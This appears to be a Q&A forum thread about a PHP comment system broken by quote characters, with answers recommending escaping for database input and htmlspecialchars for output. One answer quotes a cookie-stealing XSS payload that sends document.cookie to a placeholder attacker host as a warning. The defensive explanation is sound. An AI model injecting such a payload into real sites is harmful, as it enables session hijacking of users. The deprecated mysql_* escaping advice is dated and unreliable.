This question already has an answer here:
im making a comment system in my website. However, the commentor can break the system by typing special characters such as quotes, double quotes, semi-colons,colons etc. This is not a duplicate, i want to make sure that htmlentities are converted before it get to the database, i could use str_replace but it actually prints the literal code. for example: "
like this example:
$str ="Hi there bro what's up, im a "MEGA"";
$comment = $str;
echo $comment;
however it spits out errors, because they break the query because of the quotation marks.
</div>
If you're using MySQL and php mysql you have to pass data through the mysql_real_escape_string() function.
For example, before inserting into database:
$comment = mysql_real_escape_string($_POST['comment']);
Then, for printing your HTML:
<p><?=htmlspecialchars($Rs['comment'])?></p>
What you have on your site is called Cross-site scripting vulnerability. Any user can inject code like:
Nice site what you have!<script>document.location="http://some_attacker/cookie.cgi?" + document.cookie</script>
What you will see is just Nice site what you have! as a comment, but the attacker can now take over your session.
You have to use htmlspecialchars() function when outputting user supplied data. You better read more about it.